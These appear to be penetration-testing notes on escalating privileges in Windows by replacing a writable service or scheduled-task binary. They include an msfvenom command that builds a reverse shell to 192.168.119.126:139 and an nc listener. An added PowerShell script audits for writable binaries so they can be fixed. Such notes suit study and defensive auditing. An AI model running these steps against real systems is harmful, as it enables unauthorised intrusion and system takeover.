  • check programs run by scheduled tasks and by running services
    • schtasks /query /fo LIST /v
    • Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
  • Check permission (full or writable) of programs found
    • icacls <full-path>
    • icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
  • transfer an adduser.exe executable and rename it to the name of the writable exe found above
    • OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe
  • sc.exe stop <service-name>
  • sc.exe start <service-name>
  • nc -nvlp 139 (only if the reverse-shell exe was used)
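The whole procedure above hinges on one condition: a service or task binary that a low-privilege account can write. The script below is an added audit example (not part of the original notes) that checks that condition across every service and scheduled task at once, so an administrator can find and fix such binaries before they are abused; it assumes an elevated prompt on Windows 8 / Server 2012 or later (for `Get-ScheduledTask`) and that the principal names in `$weakPrincipals` are the ones you consider low-privilege.

```powershell
# Added audit script, not part of the original notes. Run from an elevated
# PowerShell prompt. It lists services and scheduled tasks whose target binary
# a low-privilege principal can modify (the condition the steps above depend on).
$weakPrincipals = @('Everyone', 'BUILTIN\Users',
                    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Any of these rights on the binary lets the holder replace or alter it.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete, TakeOwnership, ChangePermissions'

function Get-ExePath([string]$cmd) {
    # Strip arguments: a quoted path first; otherwise grow the token prefix until it names
    # a file (handles unquoted paths with spaces such as C:\Program Files\App\svc.exe -k).
    $cmd = $cmd.Trim()
    if ($cmd -match '^"([^"]+)"') { return $Matches[1] }
    $tokens = $cmd -split '\s+'
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $tokens[0]
}

function Get-WeakWriter([string]$path) {
    # Return the first low-privilege principal holding write-class rights, else $null.
    if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { return $null }
    foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0) { return $ace.IdentityReference.Value }
    }
    return $null
}

$findings = New-Object System.Collections.Generic.List[object]
Get-CimInstance -ClassName Win32_Service | Where-Object PathName | ForEach-Object {
    $exe = Get-ExePath $_.PathName
    $who = Get-WeakWriter $exe
    if ($who) { $findings.Add([pscustomobject]@{ Source = 'Service'; Name = $_.Name; Path = $exe; WritableBy = $who }) }
}
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in @($task.Actions)) {
        if (-not $action.Execute) { continue }   # skip COM-handler actions with no binary
        $exe = Get-ExePath ([Environment]::ExpandEnvironmentVariables($action.Execute))
        $who = Get-WeakWriter $exe
        if ($who) { $findings.Add([pscustomobject]@{ Source = 'Task'; Name = $task.TaskName; Path = $exe; WritableBy = $who }) }
    }
}
$findings | Sort-Object Source, Name | Format-Table -AutoSize
```

Every row reported is a binary to lock down (e.g. remove the write ACE with `icacls <path> /remove:g "BUILTIN\Users"` or move it under a directory only administrators can write); an empty table means the first two steps of the list above would find nothing to use.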